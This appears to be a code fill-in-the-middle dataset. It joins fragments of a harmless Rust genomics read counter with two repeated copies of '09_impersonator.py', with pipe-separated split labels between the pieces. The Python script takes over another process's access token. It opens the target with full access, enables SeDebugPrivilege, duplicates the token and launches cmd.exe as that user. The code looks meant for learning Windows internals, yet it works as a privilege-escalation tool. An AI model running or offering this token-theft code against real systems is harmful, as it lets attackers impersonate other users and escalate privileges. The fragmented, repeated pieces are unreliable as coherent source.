// (mapped_geneids, count_total)
(count_total, count_matched)
} | Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
} | random_line_split |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn | (fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
}
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) {
Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
}
}
// --------- end of basic algorithm ---
}
// (mapped_geneids, count_total)
(count_total, count_matched)
}
| process_fasta | identifier_name |
09_impersonator.py | # impersonator.py
import ctypes
from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class | (ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!")
| PRIVILEGE_SET | identifier_name |
09_impersonator.py | # impersonator.py
import ctypes
from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
|
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!")
| print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1 | conditional_block |
09_impersonator.py | # impersonator.py
import ctypes
